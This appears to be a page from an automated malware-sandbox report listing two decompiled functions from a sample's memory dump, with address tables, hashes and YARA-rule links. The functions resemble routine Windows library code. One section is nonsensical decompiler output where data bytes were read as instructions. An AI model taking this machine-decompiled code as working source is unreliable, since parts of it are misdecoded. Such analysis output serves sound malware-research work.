                                                              Function 00A4B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 76%
                                                              			E00A4B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xb1d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00A47D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00AF8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00A69E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00A6B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00A6CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00A47D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E00AF8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00A6AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xb18628; // 0x0
								_v68 = _t77;
								_t78 =  *0xb1862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xb18628; // 0x0
							_t116 =  *0xb1862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                              0x00a4b94c
                                                              0x00a4b956
                                                              0x00a4b95c
                                                              0x00a4b95e
                                                              0x00a4b964
                                                              0x00a4b969
                                                              0x00a4b96d
                                                              0x00a4b96d
                                                              0x00a4b970
                                                              0x00a4b974
                                                              0x00a4b97a
                                                              0x00a4badf
                                                              0x00a4badf
                                                              0x00a4bae2
                                                              0x00a4bae4
                                                              0x00a4bae6
                                                              0x00a4baf0
                                                              0x00a92cb8
                                                              0x00a4baf6
                                                              0x00a4baf6
                                                              0x00a4baf6
                                                              0x00a4bafd
                                                              0x00a4bb1f
                                                              0x00a4bb1f
                                                              0x00a4baff
                                                              0x00a4bb00
                                                              0x00a4bb00
                                                              0x00a4bb03
                                                              0x00a4bb03
                                                              0x00a4bacb
                                                              0x00a4bacf
                                                              0x00a4bad0
                                                              0x00a4bad1
                                                              0x00a4badc
                                                              0x00a4badc
                                                              0x00a4b980
                                                              0x00a4b980
                                                              0x00a4b988
                                                              0x00a4b98b
                                                              0x00a4b98d
                                                              0x00a4b990
                                                              0x00a4b993
                                                              0x00a4b999
                                                              0x00a4b99b
                                                              0x00a4b9a1
                                                              0x00a4b9a5
                                                              0x00a4b9aa
                                                              0x00a4b9b0
                                                              0x00a4b9bb
                                                              0x00a4b9c0
                                                              0x00a4b9c3
                                                              0x00a4b9ca
                                                              0x00a4b9cc
                                                              0x00a4b9cf
                                                              0x00a4b9d3
                                                              0x00a4b9d7
                                                              0x00a4ba94
                                                              0x00a4ba94
                                                              0x00a4ba98
                                                              0x00a4baa3
                                                              0x00a92ccb
                                                              0x00a4baa9
                                                              0x00a4baa9
                                                              0x00a4baa9
                                                              0x00a4bab1
                                                              0x00a92cd5
                                                              0x00a92cdd
                                                              0x00a92cdd
                                                              0x00a4babb
                                                              0x00a4babc
                                                              0x00a4bac2
                                                              0x00a4bac3
                                                              0x00a4bac3
                                                              0x00a4bac6
                                                              0x00000000
                                                              0x00a4b9dd
                                                              0x00a4b9dd
                                                              0x00a4b9e7
                                                              0x00a4b9e7
                                                              0x00a4b9ec
                                                              0x00a4b9ec
                                                              0x00a4b9f1
                                                              0x00a4b9f5
                                                              0x00a4b9fa
                                                              0x00a4ba00
                                                              0x00a4ba0c
                                                              0x00a4ba10
                                                              0x00a4ba10
                                                              0x00a4ba12
                                                              0x00a4ba18
                                                              0x00000000
                                                              0x00000000
                                                              0x00a4bb26
                                                              0x00a4bb26
                                                              0x00a4ba1e
                                                              0x00a4ba1e
                                                              0x00a4ba23
                                                              0x00a4ba25
                                                              0x00a4ba2c
                                                              0x00a4ba30
                                                              0x00a4ba35
                                                              0x00a4ba35
                                                              0x00a4ba41
                                                              0x00a4ba46
                                                              0x00a4ba4c
                                                              0x00a4ba50
                                                              0x00a4ba54
                                                              0x00a4ba6a
                                                              0x00a4ba6e
                                                              0x00a4ba70
                                                              0x00a4ba74
                                                              0x00a4ba78
                                                              0x00a4ba7a
                                                              0x00a4ba7c
                                                              0x00a4ba8e
                                                              0x00a4ba90
                                                              0x00a4ba92
                                                              0x00a4bb14
                                                              0x00a4bb14
                                                              0x00a4bb16
                                                              0x00a4bb16
                                                              0x00000000
                                                              0x00a4ba7c
                                                              0x00a4bb0a
                                                              0x00a4bb0d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a4bb0f

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A4B9A5
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 885266447-0
                                                              • Opcode ID: c319554b3d8a09b55855c9638726b38a61c88d320fc0d3c2ef3d4f15b97ef135
                                                              • Instruction ID: 2940a1d2df9581e8e0921468edfbd1002af28e9ad1b5a48f17fdc084391b74dd
                                                              • Opcode Fuzzy Hash: c319554b3d8a09b55855c9638726b38a61c88d320fc0d3c2ef3d4f15b97ef135
                                                              • Instruction Fuzzy Hash: 16512375A18340CFC720CF28C58092ABBF5BBC8750F64896EF69587255DB71EC44CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A52581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 83%
                                                              			E00A52581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v1524072452;
				intOrPtr _v1524085252;
				signed int _t245;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				intOrPtr _t258;
				signed int _t261;
				signed int _t268;
				signed int _t271;
				signed int _t279;
				intOrPtr _t285;
				signed int _t287;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				unsigned int _t295;
				signed int _t299;
				void* _t300;
				signed int _t301;
				signed int _t305;
				intOrPtr _t318;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t334;
				signed int _t335;
				signed int _t337;
				signed int _t339;
				signed int _t341;
				void* _t342;

				_t339 = _t341;
				_t342 = _t341 - 0x4c;
				_v8 =  *0xb1d360 ^ _t339;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t334 = 0xb1b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t295 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t285 = 0x48;
				_t315 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t327 = 0;
				_v37 = _t315;
				if(_v48 <= 0) {
					L16:
					_t45 = _t285 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t335 = 0xc0000106;
						goto L32;
					} else {
						_t334 = L00A44620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
						_v52 = _t334;
						__eflags = _t334;
						if(_t334 == 0) {
							_t335 = 0xc0000017;
							goto L32;
						} else {
							 *(_t334 + 0x44) =  *(_t334 + 0x44) & 0x00000000;
							_t50 = _t334 + 0x48; // 0x48
							_t329 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t334 + 0x3c)) = _t285;
							_t287 = 0;
							 *((short*)(_t334 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t334 + 0x18) = _t329;
								__eflags = _t315 - 0xb18478;
								 *_t334 = ((0 | _t315 == 0x00b18478) - 0x00000001 & 0xfffffffb) + 7;
								E00A6F3E0(_t329,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t342 = _t342 + 0xc;
								_t287 = 1;
								__eflags = _a8;
								_t329 = _t329 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t279 = E00AB39F2(_t329);
									_t315 = _v32;
									_t329 = _t279;
								}
							}
							_t299 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t335 = _v68;
								__eflags = 0;
								 *((short*)(_t329 - 2)) = 0;
								goto L32;
							} else {
								_t289 = _t334 + _t287 * 4;
								_v56 = _t289;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t245 =  *(_v60 + _t299 * 4);
										__eflags = _t245;
										if(_t245 == 0) {
											goto L30;
										} else {
											__eflags = _t245 == 5;
											if(_t245 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t289 =  *(_v60 + _t299 * 4);
										 *(_t289 + 0x18) = _t329;
										_t249 =  *(_v60 + _t299 * 4);
										__eflags = _t249 - 8;
										if(_t249 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t249 * 4 +  &M00A52959))) {
												case 0:
													__ax =  *0xb18488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00A6F3E0(__edi,  *0xb1848c, __ax & 0x0000ffff);
														__eax =  *0xb18488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00A6F3E0(_t329, _v80, _v64);
													_t274 = _v64;
													goto L26;
												case 2:
													 *0xb18480 & 0x0000ffff = E00A6F3E0(__edi,  *0xb18484,  *0xb18480 & 0x0000ffff);
													__eax =  *0xb18480 & 0x0000ffff;
													__eax = ( *0xb18480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00A6F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00A6F3E0(_t329, _v76, _v36);
														_t274 = _v36;
													}
													L26:
													_t342 = _t342 + 0xc;
													_t329 = _t329 + (_t274 >> 1) * 2 + 2;
													__eflags = _t329;
													L27:
													_push(0x3b);
													_pop(_t276);
													 *((short*)(_t329 - 2)) = _t276;
													goto L28;
												case 6:
													__ebx =  *0xb1575c;
													__eflags = __ebx - 0xb1575c;
													if(__ebx != 0xb1575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00A6F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xb1575c;
														} while (__ebx != 0xb1575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xb18478 & 0x0000ffff = E00A6F3E0(__edi,  *0xb1847c,  *0xb18478 & 0x0000ffff);
													__eax =  *0xb18478 & 0x0000ffff;
													__eax = ( *0xb18478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00AB39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xb16e58 & 0x0000ffff = E00A6F3E0(__edi,  *0xb16e5c,  *0xb16e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xb16e58 & 0x0000ffff;
													__eax = ( *0xb16e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t299 = _v16;
													_t315 = _v32;
													L29:
													_t289 = _t289 + 4;
													__eflags = _t289;
													_v56 = _t289;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t299 = _t299 + 1;
									_v16 = _t299;
									__eflags = _t299 - _v48;
								} while (_t299 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t249 =  *(_v60 + _t327 * 4);
						if(_t249 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t249 * 4 +  &M00A52935))) {
							case 0:
								__ax =  *0xb18488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E00A52E3E(0,  &_v64);
								_t285 = _t285 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xb18480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xb18480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00A3EEF0(0xb179a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00A3EB70(__ecx, 0xb179a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t223 = _v72;
											__eflags = _t223;
											if(_t223 != 0) {
												L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t223);
											}
											_t224 = _v52;
											__eflags = _t224;
											if(_t224 != 0) {
												__eflags = _t335;
												if(_t335 < 0) {
													L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t224);
													_t224 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t295 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xb17b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00A3EB70(__ecx, 0xb179a0);
										__eax = _v52;
										L36:
										_pop(_t328);
										_pop(_t336);
										__eflags = _v8 ^ _t339;
										_pop(_t286);
										return E00A6B640(_t224, _t286, _v8 ^ _t339, _t315, _t328, _t336);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t281 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t283 = E00A52E3E(_t281,  &_v36);
									_t295 = _v36;
									_v76 = _t283;
								}
								if(_t295 == 0) {
									goto L44;
								} else {
									_t285 = _t285 + 2 + _t295;
								}
								goto L14;
							case 6:
								__eax =  *0xb15764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xb18478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xb18478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xb16e58 & 0x0000ffff;
								__eax = ( *0xb16e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t327 = _t327 + 1;
								if(_t327 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t300 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("movsd");
					 *((intOrPtr*)(_t334 + 0x28)) =  *((intOrPtr*)(_t334 + 0x28)) + _t249;
					asm("movsd");
					_t250 = _t249 + _t249;
					asm("daa");
					asm("movsd");
					 *_t334 =  *_t334 + _t300;
					asm("es movsd");
					 *((intOrPtr*)(_t334 + 0x28)) =  *((intOrPtr*)(_t334 + 0x28)) + _t250;
					asm("movsd");
					 *0x1f00a526 =  *0x1f00a526 + _t250;
					_pop(_t290);
					__eflags = _t250 & 0xa5289400;
					 *0x200a95b =  *0x200a95b + _t315;
					_v1524072452 = _v1524072452 - _t342;
					asm("daa");
					asm("movsd");
					 *_t334 =  *_t334 + _t290;
					_v1524085252 = _v1524085252 - _t250;
					_a35 = _a35 + _t290;
					asm("movsd");
					_t251 = _t250 + _t290;
					_pop(_t291);
					__eflags = _t251 & 0xa528b400;
					 *((intOrPtr*)(_t342 + _t291 * 2)) =  *((intOrPtr*)(_t342 + _t291 * 2)) + _t315 + _t315;
					__eflags = _t251 & 0xcccccc00;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xafff00);
					E00A7D08C(_t291, _t329, _t334);
					_v44 =  *[fs:0x18];
					_t330 = 0;
					 *_a24 = 0;
					_t292 = _a12;
					__eflags = _t292;
					if(_t292 == 0) {
						_t254 = 0xc0000100;
					} else {
						_v8 = 0;
						_t337 = 0xc0000100;
						_v52 = 0xc0000100;
						_t256 = 4;
						while(1) {
							_v40 = _t256;
							__eflags = _t256;
							if(_t256 == 0) {
								break;
							}
							_t305 = _t256 * 0xc;
							_v48 = _t305;
							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0xa01664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t271 = E00A6E5C0(_a8,  *((intOrPtr*)(_t305 + 0xa01668)), _t292);
									_t342 = _t342 + 0xc;
									__eflags = _t271;
									if(__eflags == 0) {
										_t337 = E00AA51BE(_t292,  *((intOrPtr*)(_v48 + 0xa0166c)), _a16, _t330, _t337, __eflags, _a20, _a24);
										_v52 = _t337;
										break;
									} else {
										_t256 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t256 = _t256 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t337;
						__eflags = _t337;
						if(_t337 < 0) {
							__eflags = _t337 - 0xc0000100;
							if(_t337 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t330;
									if( *_t301 == _t330) {
										_t337 = 0xc0000100;
										goto L76;
									} else {
										_t318 =  *((intOrPtr*)(_v44 + 0x30));
										_t258 =  *((intOrPtr*)(_t318 + 0x10));
										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t258 + 0x48)) == _t301) {
											__eflags =  *(_t318 + 0x1c);
											if( *(_t318 + 0x1c) == 0) {
												L106:
												_t337 = E00A52AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
												_v32 = _t337;
												__eflags = _t337 - 0xc0000100;
												if(_t337 != 0xc0000100) {
													goto L69;
												} else {
													_t330 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t261 = E00A36600( *(_t318 + 0x1c));
												__eflags = _t261;
												if(_t261 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t337 = E00A52C50(_t301, _a8, _t292, _a16, _a20, _a24, _t330);
											L76:
											_v32 = _t337;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00A3EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t337 = _a24;
									_t268 = E00A52AE4( &_v36, _a8, _t292, _a16, _a20, _t337);
									_v32 = _t268;
									__eflags = _t268 - 0xc0000100;
									if(_t268 == 0xc0000100) {
										_v32 = E00A52C50(_v36, _a8, _t292, _a16, _a20, _t337, 1);
									}
									_v8 = _t330;
									E00A52ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t254 = _t337;
					}
					L70:
					return E00A7D0D1(_t254);
				}
				L108:
			}























































                                                              0x00a52584
                                                              0x00a52586
                                                              0x00a52590
                                                              0x00a52596
                                                              0x00a52597
                                                              0x00a52598
                                                              0x00a52599
                                                              0x00a5259e
                                                              0x00a525a4
                                                              0x00a525a9
                                                              0x00a525ac
                                                              0x00a525ae
                                                              0x00a525b1
                                                              0x00a525b2
                                                              0x00a525b5
                                                              0x00a525b8
                                                              0x00a525bb
                                                              0x00a525bc
                                                              0x00a525bf
                                                              0x00a525c2
                                                              0x00a525c5
                                                              0x00a525c6
                                                              0x00a525cb
                                                              0x00a525ce
                                                              0x00a525d8
                                                              0x00a525dd
                                                              0x00a525de
                                                              0x00a525e1
                                                              0x00a525e3
                                                              0x00a525e9
                                                              0x00a526da
                                                              0x00a526da
                                                              0x00a526dd
                                                              0x00a526e2
                                                              0x00a95b56
                                                              0x00000000
                                                              0x00a526e8
                                                              0x00a526f9
                                                              0x00a526fb
                                                              0x00a526fe
                                                              0x00a52700
                                                              0x00a95b60
                                                              0x00000000
                                                              0x00a52706
                                                              0x00a52706
                                                              0x00a5270a
                                                              0x00a5270a
                                                              0x00a5270d
                                                              0x00a52713
                                                              0x00a52716
                                                              0x00a52718
                                                              0x00a5271c
                                                              0x00a5271e
                                                              0x00a95b6c
                                                              0x00a95b6f
                                                              0x00a95b7f
                                                              0x00a95b89
                                                              0x00a95b8e
                                                              0x00a95b93
                                                              0x00a95b96
                                                              0x00a95b9c
                                                              0x00a95ba0
                                                              0x00a95ba3
                                                              0x00a95bab
                                                              0x00a95bb0
                                                              0x00a95bb3
                                                              0x00a95bb3
                                                              0x00a95ba3
                                                              0x00a52724
                                                              0x00a52726
                                                              0x00a52729
                                                              0x00a5272c
                                                              0x00a5279d
                                                              0x00a5279d
                                                              0x00a527a0
                                                              0x00a527a2
                                                              0x00000000
                                                              0x00a5272e
                                                              0x00a5272e
                                                              0x00a52731
                                                              0x00a52734
                                                              0x00a52734
                                                              0x00a52736
                                                              0x00a95bc1
                                                              0x00a95bc1
                                                              0x00a95bc4
                                                              0x00000000
                                                              0x00a95bca
                                                              0x00a95bca
                                                              0x00a95bcd
                                                              0x00000000
                                                              0x00a95bd3
                                                              0x00000000
                                                              0x00a95bd3
                                                              0x00a95bcd
                                                              0x00a5273c
                                                              0x00a5273c
                                                              0x00a52742
                                                              0x00a52747
                                                              0x00a5274a
                                                              0x00a5274d
                                                              0x00a52750
                                                              0x00000000
                                                              0x00a52756
                                                              0x00a52756
                                                              0x00000000
                                                              0x00a52902
                                                              0x00a52908
                                                              0x00a5290b
                                                              0x00000000
                                                              0x00a52911
                                                              0x00a5291c
                                                              0x00a52921
                                                              0x00000000
                                                              0x00a52921
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52880
                                                              0x00a52887
                                                              0x00a5288c
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52805
                                                              0x00a5280a
                                                              0x00a52814
                                                              0x00a52816
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5281e
                                                              0x00a52821
                                                              0x00a52823
                                                              0x00000000
                                                              0x00a52829
                                                              0x00a52829
                                                              0x00a52831
                                                              0x00a5283c
                                                              0x00a5283e
                                                              0x00000000
                                                              0x00a5283e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5284e
                                                              0x00a52850
                                                              0x00a52851
                                                              0x00a52854
                                                              0x00a52857
                                                              0x00a5285a
                                                              0x00a5285c
                                                              0x00a5285d
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5275d
                                                              0x00a52761
                                                              0x00000000
                                                              0x00a52767
                                                              0x00a5276e
                                                              0x00a52773
                                                              0x00a52773
                                                              0x00a52776
                                                              0x00a52778
                                                              0x00a5277e
                                                              0x00a5277e
                                                              0x00a52781
                                                              0x00a52781
                                                              0x00a52783
                                                              0x00a52784
                                                              0x00000000
                                                              0x00000000
                                                              0x00a95bd8
                                                              0x00a95bde
                                                              0x00a95be4
                                                              0x00a95be6
                                                              0x00a95be8
                                                              0x00a95be9
                                                              0x00a95bee
                                                              0x00a95bf8
                                                              0x00a95bff
                                                              0x00a95c01
                                                              0x00a95c04
                                                              0x00a95c07
                                                              0x00a95c0b
                                                              0x00a95c0d
                                                              0x00a95c0d
                                                              0x00a95c15
                                                              0x00a95c18
                                                              0x00a95c1b
                                                              0x00a95c1b
                                                              0x00a95c1e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a528c3
                                                              0x00a528c8
                                                              0x00a528d2
                                                              0x00a528d4
